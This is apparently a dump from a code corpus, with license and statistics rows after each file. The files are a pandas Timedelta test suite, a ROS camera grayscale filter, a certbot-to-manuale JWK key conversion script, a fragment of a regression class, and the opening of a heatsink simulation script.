def __init__(self, beta_init_type = 'zeros', learn_rate_type = 'partial_hessian'):
self.__betas = np.empty((0, 0))
self.__subclasses = {}
self.set_subclass('beta_init', beta_init_type)
self.set_subclass('learn_rate', learn_rate_type)
def get_type(self):
return self.__class_type
def set_subclass(self, subitem, subitem_type, *args, **kwargs):
self.__subclasses[subitem] = (subitem_type, rf.upload_module(self.__lookup_dict[subitem][subitem_type])(*args, **kwargs))
def call_submethod(self, subitem, submethod, *args, **kwargs):
return getattr(self.__subclasses[subitem][1], submethod)(*args, **kwargs)
def get_subclass_type(self, subitem):
return self.__subclasses.get(subitem, (None))[0]
def init_betas(self, feature_count):
self.__betas = self.call_submethod('beta_init', 'initialize', feature_count)
def predict(self, input_data):
return np.dot(input_data, self.__betas)
|
gpl-3.0
| 1,337,883,345,496,032,800
| 35.8
| 129
| 0.598187
| false
| 3.621444
| false
| false
| false
|
OSUrobotics/privacy-interfaces
|
filtering/text_filters/scripts/try_something_new.py
|
1
|
1266
|
#!/usr/bin/env python
import rospy
from cv_bridge import CvBridge
import cv, cv2
import numpy
from sensor_msgs.msg import Image
bridge = CvBridge()
pub = rospy.Publisher("/image_out", Image)
def image_callback(image):
""" Applies a new filter to the image and displays the result. """
image_cv = bridge.imgmsg_to_cv(image)
image_cv2 = numpy.asarray(image_cv)
# Downsample the grayscale image
gray = image_cv2[:, :, 0]/3 + image_cv2[:, :, 1]/3 + image_cv2[:, :, 2]/3
gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
# Make new 3-channel image
image_new = numpy.zeros((gray.shape[0], gray.shape[1], image_cv2.shape[2]))
image_new[:, :, 0] = image_new[:, :, 1] = image_new[:, :, 2] = gray
image_new = image_new.astype('uint8')
print image_new.shape
# Re-publish
image.data = bridge.cv_to_imgmsg(cv.fromarray(image_new),
encoding=image.encoding).data
image.width = image_new.shape[1]
image.height = image_new.shape[0]
image.step = image.width * 3
pub.publish(image)
if __name__ == "__main__":
rospy.init_node("new_filter")
rospy.Subscriber("/camera/rgb/image_color", Image, image_callback)
rospy.spin()
|
mit
| -8,800,374,811,631,611,000
| 29.142857
| 79
| 0.621643
| false
| 3.133663
| false
| false
| false
|
zfrenchee/pandas
|
pandas/tests/scalar/test_timedelta.py
|
1
|
33010
|
""" test the scalar Timedelta """
import pytest
import numpy as np
from datetime import timedelta
import pandas as pd
import pandas.util.testing as tm
from pandas.core.tools.timedeltas import _coerce_scalar_to_timedelta_type as ct
from pandas import (Timedelta, TimedeltaIndex, timedelta_range, Series,
to_timedelta, compat)
from pandas._libs.tslib import iNaT, NaT
class TestTimedeltaArithmetic(object):
_multiprocess_can_split_ = True
def test_arithmetic_overflow(self):
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + pd.Timedelta(13 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + timedelta(days=13 * 19999)
def test_ops_error_str(self):
# GH 13624
td = Timedelta('1 day')
for left, right in [(td, 'a'), ('a', td)]:
with pytest.raises(TypeError):
left + right
with pytest.raises(TypeError):
left > right
assert not left == right
assert left != right
def test_to_timedelta_on_nanoseconds(self):
# GH 9273
result = Timedelta(nanoseconds=100)
expected = Timedelta('100ns')
assert result == expected
result = Timedelta(days=1, hours=1, minutes=1, weeks=1, seconds=1,
milliseconds=1, microseconds=1, nanoseconds=1)
expected = Timedelta(694861001001001)
assert result == expected
result = Timedelta(microseconds=1) + Timedelta(nanoseconds=1)
expected = Timedelta('1us1ns')
assert result == expected
result = Timedelta(microseconds=1) - Timedelta(nanoseconds=1)
expected = Timedelta('999ns')
assert result == expected
result = Timedelta(microseconds=1) + 5 * Timedelta(nanoseconds=-2)
expected = Timedelta('990ns')
assert result == expected
pytest.raises(TypeError, lambda: Timedelta(nanoseconds='abc'))
def test_ops_notimplemented(self):
class Other:
pass
other = Other()
td = Timedelta('1 day')
assert td.__add__(other) is NotImplemented
assert td.__sub__(other) is NotImplemented
assert td.__truediv__(other) is NotImplemented
assert td.__mul__(other) is NotImplemented
assert td.__floordiv__(other) is NotImplemented
def test_timedelta_ops_scalar(self):
# GH 6808
base = pd.to_datetime('20130101 09:01:12.123456')
expected_add = pd.to_datetime('20130101 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta(10, unit='s'), timedelta(seconds=10),
np.timedelta64(10, 's'),
np.timedelta64(10000000000, 'ns'),
pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
base = pd.to_datetime('20130102 09:01:12.123456')
expected_add = pd.to_datetime('20130103 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta('1 day, 00:00:10'),
pd.to_timedelta('1 days, 00:00:10'),
timedelta(days=1, seconds=10),
np.timedelta64(1, 'D') + np.timedelta64(10, 's'),
pd.offsets.Day() + pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
def test_ops_offsets(self):
td = Timedelta(10, unit='d')
assert Timedelta(241, unit='h') == td + pd.offsets.Hour(1)
assert Timedelta(241, unit='h') == pd.offsets.Hour(1) + td
assert 240 == td / pd.offsets.Hour(1)
assert 1 / 240.0 == pd.offsets.Hour(1) / td
assert Timedelta(239, unit='h') == td - pd.offsets.Hour(1)
assert Timedelta(-239, unit='h') == pd.offsets.Hour(1) - td
def test_unary_ops(self):
td = Timedelta(10, unit='d')
# __neg__, __pos__
assert -td == Timedelta(-10, unit='d')
assert -td == Timedelta('-10d')
assert +td == Timedelta(10, unit='d')
# __abs__, __abs__(__neg__)
assert abs(td) == td
assert abs(-td) == td
assert abs(-td) == Timedelta('10d')
def test_binary_ops_nat(self):
td = Timedelta(10, unit='d')
assert (td - pd.NaT) is pd.NaT
assert (td + pd.NaT) is pd.NaT
assert (td * pd.NaT) is pd.NaT
assert (td / pd.NaT) is np.nan
assert (td // pd.NaT) is np.nan
def test_binary_ops_integers(self):
td = Timedelta(10, unit='d')
assert td * 2 == Timedelta(20, unit='d')
assert td / 2 == Timedelta(5, unit='d')
assert td // 2 == Timedelta(5, unit='d')
# invert
assert td * -1 == Timedelta('-10d')
assert -1 * td == Timedelta('-10d')
# can't operate with integers
pytest.raises(TypeError, lambda: td + 2)
pytest.raises(TypeError, lambda: td - 2)
def test_binary_ops_with_timedelta(self):
td = Timedelta(10, unit='d')
assert td - td == Timedelta(0, unit='ns')
assert td + td == Timedelta(20, unit='d')
assert td / td == 1
# invalid multiply with another timedelta
pytest.raises(TypeError, lambda: td * td)
class TestTimedeltaComparison(object):
def test_comparison_object_array(self):
# analogous to GH#15183
td = Timedelta('2 days')
other = Timedelta('3 hours')
arr = np.array([other, td], dtype=object)
res = arr == td
expected = np.array([False, True], dtype=bool)
assert (res == expected).all()
# 2D case
arr = np.array([[other, td],
[td, other]],
dtype=object)
res = arr != td
expected = np.array([[True, False], [False, True]], dtype=bool)
assert res.shape == expected.shape
assert (res == expected).all()
class TestTimedeltas(object):
_multiprocess_can_split_ = True
def setup_method(self, method):
pass
def test_construction(self):
expected = np.timedelta64(10, 'D').astype('m8[ns]').view('i8')
assert Timedelta(10, unit='d').value == expected
assert Timedelta(10.0, unit='d').value == expected
assert Timedelta('10 days').value == expected
assert Timedelta(days=10).value == expected
assert Timedelta(days=10.0).value == expected
expected += np.timedelta64(10, 's').astype('m8[ns]').view('i8')
assert Timedelta('10 days 00:00:10').value == expected
assert Timedelta(days=10, seconds=10).value == expected
assert Timedelta(days=10, milliseconds=10 * 1000).value == expected
assert (Timedelta(days=10, microseconds=10 * 1000 * 1000)
.value == expected)
# gh-8757: test construction with np dtypes
timedelta_kwargs = {'days': 'D',
'seconds': 's',
'microseconds': 'us',
'milliseconds': 'ms',
'minutes': 'm',
'hours': 'h',
'weeks': 'W'}
npdtypes = [np.int64, np.int32, np.int16, np.float64, np.float32,
np.float16]
for npdtype in npdtypes:
for pykwarg, npkwarg in timedelta_kwargs.items():
expected = np.timedelta64(1, npkwarg).astype(
'm8[ns]').view('i8')
assert Timedelta(**{pykwarg: npdtype(1)}).value == expected
# rounding cases
assert Timedelta(82739999850000).value == 82739999850000
assert ('0 days 22:58:59.999850' in str(Timedelta(82739999850000)))
assert Timedelta(123072001000000).value == 123072001000000
assert ('1 days 10:11:12.001' in str(Timedelta(123072001000000)))
# string conversion with/without leading zero
# GH 9570
assert Timedelta('0:00:00') == timedelta(hours=0)
assert Timedelta('00:00:00') == timedelta(hours=0)
assert Timedelta('-1:00:00') == -timedelta(hours=1)
assert Timedelta('-01:00:00') == -timedelta(hours=1)
# more strings & abbrevs
# GH 8190
assert Timedelta('1 h') == timedelta(hours=1)
assert Timedelta('1 hour') == timedelta(hours=1)
assert Timedelta('1 hr') == timedelta(hours=1)
assert Timedelta('1 hours') == timedelta(hours=1)
assert Timedelta('-1 hours') == -timedelta(hours=1)
assert Timedelta('1 m') == timedelta(minutes=1)
assert Timedelta('1.5 m') == timedelta(seconds=90)
assert Timedelta('1 minute') == timedelta(minutes=1)
assert Timedelta('1 minutes') == timedelta(minutes=1)
assert Timedelta('1 s') == timedelta(seconds=1)
assert Timedelta('1 second') == timedelta(seconds=1)
assert Timedelta('1 seconds') == timedelta(seconds=1)
assert Timedelta('1 ms') == timedelta(milliseconds=1)
assert Timedelta('1 milli') == timedelta(milliseconds=1)
assert Timedelta('1 millisecond') == timedelta(milliseconds=1)
assert Timedelta('1 us') == timedelta(microseconds=1)
assert Timedelta('1 micros') == timedelta(microseconds=1)
assert Timedelta('1 microsecond') == timedelta(microseconds=1)
assert Timedelta('1.5 microsecond') == Timedelta('00:00:00.000001500')
assert Timedelta('1 ns') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nano') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nanosecond') == Timedelta('00:00:00.000000001')
# combos
assert Timedelta('10 days 1 hour') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h 1m 1s') == timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s 3us') == -timedelta(
days=10, hours=1, minutes=1, seconds=1, microseconds=3)
assert Timedelta('-10 days 1 h 1.5m 1s 3us'), -timedelta(
days=10, hours=1, minutes=1, seconds=31, microseconds=3)
# Currently invalid as it has a - on the hh:mm:dd part
# (only allowed on the days)
pytest.raises(ValueError,
lambda: Timedelta('-10 days -1 h 1.5m 1s 3us'))
# only leading neg signs are allowed
pytest.raises(ValueError,
lambda: Timedelta('10 days -1 h 1.5m 1s 3us'))
# no units specified
pytest.raises(ValueError, lambda: Timedelta('3.1415'))
# invalid construction
tm.assert_raises_regex(ValueError, "cannot construct a Timedelta",
lambda: Timedelta())
tm.assert_raises_regex(ValueError,
"unit abbreviation w/o a number",
lambda: Timedelta('foo'))
tm.assert_raises_regex(ValueError,
"cannot construct a Timedelta from the "
"passed arguments, allowed keywords are ",
lambda: Timedelta(day=10))
# round-trip both for string and value
for v in ['1s', '-1s', '1us', '-1us', '1 day', '-1 day',
'-23:59:59.999999', '-1 days +23:59:59.999999', '-1ns',
'1ns', '-23:59:59.999999999']:
td = Timedelta(v)
assert Timedelta(td.value) == td
# str does not normally display nanos
if not td.nanoseconds:
assert Timedelta(str(td)) == td
assert Timedelta(td._repr_base(format='all')) == td
# floats
expected = np.timedelta64(
10, 's').astype('m8[ns]').view('i8') + np.timedelta64(
500, 'ms').astype('m8[ns]').view('i8')
assert Timedelta(10.5, unit='s').value == expected
# offset
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Second(2)) ==
Timedelta('0 days, 00:00:02'))
# gh-11995: unicode
expected = Timedelta('1H')
result = pd.Timedelta(u'1H')
assert result == expected
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta(u'0 days, 02:00:00'))
pytest.raises(ValueError, lambda: Timedelta(u'foo bar'))
def test_overflow_on_construction(self):
# xref https://github.com/statsmodels/statsmodels/issues/3374
value = pd.Timedelta('1day').value * 20169940
pytest.raises(OverflowError, pd.Timedelta, value)
# xref gh-17637
with pytest.raises(OverflowError):
pd.Timedelta(7 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timedelta(timedelta(days=13 * 19999))
def test_total_seconds_scalar(self):
# see gh-10939
rng = Timedelta('1 days, 10:11:12.100123456')
expt = 1 * 86400 + 10 * 3600 + 11 * 60 + 12 + 100123456. / 1e9
tm.assert_almost_equal(rng.total_seconds(), expt)
rng = Timedelta(np.nan)
assert np.isnan(rng.total_seconds())
def test_repr(self):
assert (repr(Timedelta(10, unit='d')) ==
"Timedelta('10 days 00:00:00')")
assert (repr(Timedelta(10, unit='s')) ==
"Timedelta('0 days 00:00:10')")
assert (repr(Timedelta(10, unit='ms')) ==
"Timedelta('0 days 00:00:00.010000')")
assert (repr(Timedelta(-10, unit='ms')) ==
"Timedelta('-1 days +23:59:59.990000')")
def test_conversion(self):
for td in [Timedelta(10, unit='d'),
Timedelta('1 days, 10:11:12.012345')]:
pydt = td.to_pytimedelta()
assert td == Timedelta(pydt)
assert td == pydt
assert (isinstance(pydt, timedelta) and not isinstance(
pydt, Timedelta))
assert td == np.timedelta64(td.value, 'ns')
td64 = td.to_timedelta64()
assert td64 == np.timedelta64(td.value, 'ns')
assert td == td64
assert isinstance(td64, np.timedelta64)
# this is NOT equal and cannot be roundtriped (because of the nanos)
td = Timedelta('1 days, 10:11:12.012345678')
assert td != td.to_pytimedelta()
def test_freq_conversion(self):
# truediv
td = Timedelta('1 days 2 hours 3 ns')
result = td / np.timedelta64(1, 'D')
assert result == td.value / float(86400 * 1e9)
result = td / np.timedelta64(1, 's')
assert result == td.value / float(1e9)
result = td / np.timedelta64(1, 'ns')
assert result == td.value
# floordiv
td = Timedelta('1 days 2 hours 3 ns')
result = td // np.timedelta64(1, 'D')
assert result == 1
result = td // np.timedelta64(1, 's')
assert result == 93600
result = td // np.timedelta64(1, 'ns')
assert result == td.value
def test_fields(self):
def check(value):
# that we are int/long like
assert isinstance(value, (int, compat.long))
# compat to datetime.timedelta
rng = to_timedelta('1 days, 10:11:12')
assert rng.days == 1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 0
assert rng.nanoseconds == 0
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# GH 10050
check(rng.days)
check(rng.seconds)
check(rng.microseconds)
check(rng.nanoseconds)
td = Timedelta('-1 days, 10:11:12')
assert abs(td) == Timedelta('13:48:48')
assert str(td) == "-1 days +10:11:12"
assert -td == Timedelta('0 days 13:48:48')
assert -Timedelta('-1 days, 10:11:12').value == 49728000000000
assert Timedelta('-1 days, 10:11:12').value == -49728000000000
rng = to_timedelta('-1 days, 10:11:12.100123456')
assert rng.days == -1
assert rng.seconds == 10 * 3600 + 11 * 60 + 12
assert rng.microseconds == 100 * 1000 + 123
assert rng.nanoseconds == 456
pytest.raises(AttributeError, lambda: rng.hours)
pytest.raises(AttributeError, lambda: rng.minutes)
pytest.raises(AttributeError, lambda: rng.milliseconds)
# components
tup = pd.to_timedelta(-1, 'us').components
assert tup.days == -1
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
# GH 10050
check(tup.days)
check(tup.hours)
check(tup.minutes)
check(tup.seconds)
check(tup.milliseconds)
check(tup.microseconds)
check(tup.nanoseconds)
tup = Timedelta('-1 days 1 us').components
assert tup.days == -2
assert tup.hours == 23
assert tup.minutes == 59
assert tup.seconds == 59
assert tup.milliseconds == 999
assert tup.microseconds == 999
assert tup.nanoseconds == 0
def test_nat_converters(self):
assert to_timedelta('nat', box=False).astype('int64') == iNaT
assert to_timedelta('nan', box=False).astype('int64') == iNaT
def testit(unit, transform):
# array
result = to_timedelta(np.arange(5), unit=unit)
expected = TimedeltaIndex([np.timedelta64(i, transform(unit))
for i in np.arange(5).tolist()])
tm.assert_index_equal(result, expected)
# scalar
result = to_timedelta(2, unit=unit)
expected = Timedelta(np.timedelta64(2, transform(unit)).astype(
'timedelta64[ns]'))
assert result == expected
# validate all units
# GH 6855
for unit in ['Y', 'M', 'W', 'D', 'y', 'w', 'd']:
testit(unit, lambda x: x.upper())
for unit in ['days', 'day', 'Day', 'Days']:
testit(unit, lambda x: 'D')
for unit in ['h', 'm', 's', 'ms', 'us', 'ns', 'H', 'S', 'MS', 'US',
'NS']:
testit(unit, lambda x: x.lower())
# offsets
# m
testit('T', lambda x: 'm')
# ms
testit('L', lambda x: 'ms')
def test_numeric_conversions(self):
assert ct(0) == np.timedelta64(0, 'ns')
assert ct(10) == np.timedelta64(10, 'ns')
assert ct(10, unit='ns') == np.timedelta64(10, 'ns').astype('m8[ns]')
assert ct(10, unit='us') == np.timedelta64(10, 'us').astype('m8[ns]')
assert ct(10, unit='ms') == np.timedelta64(10, 'ms').astype('m8[ns]')
assert ct(10, unit='s') == np.timedelta64(10, 's').astype('m8[ns]')
assert ct(10, unit='d') == np.timedelta64(10, 'D').astype('m8[ns]')
def test_timedelta_conversions(self):
assert (ct(timedelta(seconds=1)) ==
np.timedelta64(1, 's').astype('m8[ns]'))
assert (ct(timedelta(microseconds=1)) ==
np.timedelta64(1, 'us').astype('m8[ns]'))
assert (ct(timedelta(days=1)) ==
np.timedelta64(1, 'D').astype('m8[ns]'))
def test_round(self):
t1 = Timedelta('1 days 02:34:56.789123456')
t2 = Timedelta('-1 days 02:34:56.789123456')
for (freq, s1, s2) in [('N', t1, t2),
('U', Timedelta('1 days 02:34:56.789123000'),
Timedelta('-1 days 02:34:56.789123000')),
('L', Timedelta('1 days 02:34:56.789000000'),
Timedelta('-1 days 02:34:56.789000000')),
('S', Timedelta('1 days 02:34:57'),
Timedelta('-1 days 02:34:57')),
('2S', Timedelta('1 days 02:34:56'),
Timedelta('-1 days 02:34:56')),
('5S', Timedelta('1 days 02:34:55'),
Timedelta('-1 days 02:34:55')),
('T', Timedelta('1 days 02:35:00'),
Timedelta('-1 days 02:35:00')),
('12T', Timedelta('1 days 02:36:00'),
Timedelta('-1 days 02:36:00')),
('H', Timedelta('1 days 03:00:00'),
Timedelta('-1 days 03:00:00')),
('d', Timedelta('1 days'),
Timedelta('-1 days'))]:
r1 = t1.round(freq)
assert r1 == s1
r2 = t2.round(freq)
assert r2 == s2
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
t1 = timedelta_range('1 days', periods=3, freq='1 min 2 s 3 us')
t2 = -1 * t1
t1a = timedelta_range('1 days', periods=3, freq='1 min 2 s')
t1c = pd.TimedeltaIndex([1, 1, 1], unit='D')
# note that negative times round DOWN! so don't give whole numbers
for (freq, s1, s2) in [('N', t1, t2),
('U', t1, t2),
('L', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('S', t1a,
TimedeltaIndex(['-1 days +00:00:00',
'-2 days +23:58:58',
'-2 days +23:57:56'],
dtype='timedelta64[ns]',
freq=None)
),
('12T', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('H', t1c,
TimedeltaIndex(['-1 days',
'-1 days',
'-1 days'],
dtype='timedelta64[ns]',
freq=None)
),
('d', t1c,
pd.TimedeltaIndex([-1, -1, -1], unit='D')
)]:
r1 = t1.round(freq)
tm.assert_index_equal(r1, s1)
r2 = t2.round(freq)
tm.assert_index_equal(r2, s2)
# invalid
for freq in ['Y', 'M', 'foobar']:
pytest.raises(ValueError, lambda: t1.round(freq))
def test_contains(self):
# Checking for any NaT-like objects
# GH 13603
td = to_timedelta(range(5), unit='d') + pd.offsets.Hour(1)
for v in [pd.NaT, None, float('nan'), np.nan]:
assert not (v in td)
td = to_timedelta([pd.NaT])
for v in [pd.NaT, None, float('nan'), np.nan]:
assert (v in td)
def test_identity(self):
td = Timedelta(10, unit='d')
assert isinstance(td, Timedelta)
assert isinstance(td, timedelta)
def test_short_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
assert ct('10') == np.timedelta64(10, 'ns')
assert ct('10ns') == np.timedelta64(10, 'ns')
assert ct('100') == np.timedelta64(100, 'ns')
assert ct('100ns') == np.timedelta64(100, 'ns')
assert ct('1000') == np.timedelta64(1000, 'ns')
assert ct('1000ns') == np.timedelta64(1000, 'ns')
assert ct('1000NS') == np.timedelta64(1000, 'ns')
assert ct('10us') == np.timedelta64(10000, 'ns')
assert ct('100us') == np.timedelta64(100000, 'ns')
assert ct('1000us') == np.timedelta64(1000000, 'ns')
assert ct('1000Us') == np.timedelta64(1000000, 'ns')
assert ct('1000uS') == np.timedelta64(1000000, 'ns')
assert ct('1ms') == np.timedelta64(1000000, 'ns')
assert ct('10ms') == np.timedelta64(10000000, 'ns')
assert ct('100ms') == np.timedelta64(100000000, 'ns')
assert ct('1000ms') == np.timedelta64(1000000000, 'ns')
assert ct('-1s') == -np.timedelta64(1000000000, 'ns')
assert ct('1s') == np.timedelta64(1000000000, 'ns')
assert ct('10s') == np.timedelta64(10000000000, 'ns')
assert ct('100s') == np.timedelta64(100000000000, 'ns')
assert ct('1000s') == np.timedelta64(1000000000000, 'ns')
assert ct('1d') == conv(np.timedelta64(1, 'D'))
assert ct('-1d') == -conv(np.timedelta64(1, 'D'))
assert ct('1D') == conv(np.timedelta64(1, 'D'))
assert ct('10D') == conv(np.timedelta64(10, 'D'))
assert ct('100D') == conv(np.timedelta64(100, 'D'))
assert ct('1000D') == conv(np.timedelta64(1000, 'D'))
assert ct('10000D') == conv(np.timedelta64(10000, 'D'))
# space
assert ct(' 10000D ') == conv(np.timedelta64(10000, 'D'))
assert ct(' - 10000D ') == -conv(np.timedelta64(10000, 'D'))
# invalid
pytest.raises(ValueError, ct, '1foo')
pytest.raises(ValueError, ct, 'foo')
def test_full_format_converters(self):
def conv(v):
return v.astype('m8[ns]')
d1 = np.timedelta64(1, 'D')
assert ct('1days') == conv(d1)
assert ct('1days,') == conv(d1)
assert ct('- 1days,') == -conv(d1)
assert ct('00:00:01') == conv(np.timedelta64(1, 's'))
assert ct('06:00:01') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.0') == conv(np.timedelta64(6 * 3600 + 1, 's'))
assert ct('06:00:01.01') == conv(np.timedelta64(
1000 * (6 * 3600 + 1) + 10, 'ms'))
assert (ct('- 1days, 00:00:01') ==
conv(-d1 + np.timedelta64(1, 's')))
assert (ct('1days, 06:00:01') ==
conv(d1 + np.timedelta64(6 * 3600 + 1, 's')))
assert (ct('1days, 06:00:01.01') ==
conv(d1 + np.timedelta64(1000 * (6 * 3600 + 1) + 10, 'ms')))
# invalid
pytest.raises(ValueError, ct, '- 1days, 00')
def test_overflow(self):
# GH 9442
s = Series(pd.date_range('20130101', periods=100000, freq='H'))
s[0] += pd.Timedelta('1s 1ms')
# mean
result = (s - s.min()).mean()
expected = pd.Timedelta((pd.DatetimeIndex((s - s.min())).asi8 / len(s)
).sum())
# the computation is converted to float so
# might be some loss of precision
assert np.allclose(result.value / 1000, expected.value / 1000)
# sum
pytest.raises(ValueError, lambda: (s - s.min()).sum())
s1 = s[0:10000]
pytest.raises(ValueError, lambda: (s1 - s1.min()).sum())
s2 = s[0:1000]
result = (s2 - s2.min()).sum()
def test_pickle(self):
v = Timedelta('1 days 10:11:12.0123456')
v_p = tm.round_trip_pickle(v)
assert v == v_p
def test_timedelta_hash_equality(self):
# GH 11129
v = Timedelta(1, 'D')
td = timedelta(days=1)
assert hash(v) == hash(td)
d = {td: 2}
assert d[v] == 2
tds = timedelta_range('1 second', periods=20)
assert all(hash(td) == hash(td.to_pytimedelta()) for td in tds)
# python timedeltas drop ns resolution
ns_td = Timedelta(1, 'ns')
assert hash(ns_td) != hash(ns_td.to_pytimedelta())
def test_implementation_limits(self):
min_td = Timedelta(Timedelta.min)
max_td = Timedelta(Timedelta.max)
# GH 12727
# timedelta limits correspond to int64 boundaries
assert min_td.value == np.iinfo(np.int64).min + 1
assert max_td.value == np.iinfo(np.int64).max
# Beyond lower limit, a NAT before the Overflow
assert (min_td - Timedelta(1, 'ns')) is NaT
with pytest.raises(OverflowError):
min_td - Timedelta(2, 'ns')
with pytest.raises(OverflowError):
max_td + Timedelta(1, 'ns')
# Same tests using the internal nanosecond values
td = Timedelta(min_td.value - 1, 'ns')
assert td is NaT
with pytest.raises(OverflowError):
Timedelta(min_td.value - 2, 'ns')
with pytest.raises(OverflowError):
Timedelta(max_td.value + 1, 'ns')
def test_timedelta_arithmetic(self):
data = pd.Series(['nat', '32 days'], dtype='timedelta64[ns]')
deltas = [timedelta(days=1), Timedelta(1, unit='D')]
for delta in deltas:
result_method = data.add(delta)
result_operator = data + delta
expected = pd.Series(['nat', '33 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
result_method = data.sub(delta)
result_operator = data - delta
expected = pd.Series(['nat', '31 days'], dtype='timedelta64[ns]')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
# GH 9396
result_method = data.div(delta)
result_operator = data / delta
expected = pd.Series([np.nan, 32.], dtype='float64')
tm.assert_series_equal(result_operator, expected)
tm.assert_series_equal(result_method, expected)
def test_apply_to_timedelta(self):
timedelta_NaT = pd.to_timedelta('NaT')
list_of_valid_strings = ['00:00:01', '00:00:02']
a = pd.to_timedelta(list_of_valid_strings)
b = Series(list_of_valid_strings).apply(pd.to_timedelta)
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
list_of_strings = ['00:00:01', np.nan, pd.NaT, timedelta_NaT]
# TODO: unused?
a = pd.to_timedelta(list_of_strings) # noqa
b = Series(list_of_strings).apply(pd.to_timedelta) # noqa
# Can't compare until apply on a Series gives the correct dtype
# assert_series_equal(a, b)
def test_components(self):
rng = timedelta_range('1 days, 10:11:12', periods=2, freq='s')
rng.components
# with nat
s = Series(rng)
s[1] = np.nan
result = s.dt.components
assert not result.iloc[0].isna().all()
assert result.iloc[1].isna().all()
def test_isoformat(self):
td = Timedelta(days=6, minutes=50, seconds=3,
milliseconds=10, microseconds=10, nanoseconds=12)
expected = 'P6DT0H50M3.010010012S'
result = td.isoformat()
assert result == expected
td = Timedelta(days=4, hours=12, minutes=30, seconds=5)
result = td.isoformat()
expected = 'P4DT12H30M5S'
assert result == expected
td = Timedelta(nanoseconds=123)
result = td.isoformat()
expected = 'P0DT0H0M0.000000123S'
assert result == expected
# trim nano
td = Timedelta(microseconds=10)
result = td.isoformat()
expected = 'P0DT0H0M0.00001S'
assert result == expected
# trim micro
td = Timedelta(milliseconds=1)
result = td.isoformat()
expected = 'P0DT0H0M0.001S'
assert result == expected
# don't strip every 0
result = Timedelta(minutes=1).isoformat()
expected = 'P0DT0H1M0S'
assert result == expected
|
bsd-3-clause
| 3,114,407,795,892,254,000
| 37.608187
| 79
| 0.526022
| false
| 3.768695
| true
| false
| false
|
szepeviktor/debian-server-tools
|
security/jwk_convert.py
|
1
|
1364
|
#!/usr/bin/python
"""Convert certbot private_key.json to manuale's account.json
Source: https://gist.github.com/JonLundy/f25c99ee0770e19dc595
./jwk_convert.py private_key.json > private-key.asn1
openssl asn1parse -genconf private-key.asn1 -noout -out private-key.der
openssl rsa -inform DER -in private-key.der -outform PEM -out private-key.key
echo -n '{"key": "' > account.json
paste -s -d '|' private-key.key | sed -e 's/|/\\n/g' | tr -d '\n' >> account.json
echo '", "uri": "https://acme-v01.api.letsencrypt.org/acme/reg/9999999"}' >> account.json # From regr.json
"""
import sys
import json
import base64
import binascii
with open(sys.argv[1]) as fp:
PKEY = json.load(fp)
def enc(data):
missing_padding = 4 - len(data) % 4
if missing_padding:
data += b'=' * missing_padding
return '0x'+binascii.hexlify(base64.b64decode(data, b'-_')).upper()
for k, v in PKEY.items():
if k == 'kty':
continue
PKEY[k] = enc(v.encode())
print "asn1=SEQUENCE:private_key\n[private_key]\nversion=INTEGER:0"
print "n=INTEGER:{}".format(PKEY[u'n'])
print "e=INTEGER:{}".format(PKEY[u'e'])
print "d=INTEGER:{}".format(PKEY[u'd'])
print "p=INTEGER:{}".format(PKEY[u'p'])
print "q=INTEGER:{}".format(PKEY[u'q'])
print "dp=INTEGER:{}".format(PKEY[u'dp'])
print "dq=INTEGER:{}".format(PKEY[u'dq'])
print "qi=INTEGER:{}".format(PKEY[u'qi'])
|
mit
| -5,849,783,586,539,344,000
| 32.268293
| 106
| 0.66349
| false
| 2.669276
| false
| false
| false
|
zagl/ccx-user
|
tutorials/auto/geom.py
|
1
|
3805
|
#!/usr/bin/env python3
import pycgx
import re
import fileinput
import subprocess
def heatSinkTemp(length, width, height, n_fins, fin_width,
base_width, conductivity, ta, emissivity, flux):
fin_spacing = (width- fin_width) /(n_fins -1) - fin_width
flux_density = flux / (length*width)
c = pycgx.Cgx()
heatsink = c.makeHeatsink(
[0., 0., 0.],
[length, width, height],
n_fins, fin_width, base_width,
[4,2,2],
'heatsink'
)
top = c.makeSet("ht")
top.add(heatsink.maxX)
bottom = c.makeSet("hb")
bottom.add(heatsink.minX)
channel = c.makeSet("hc")
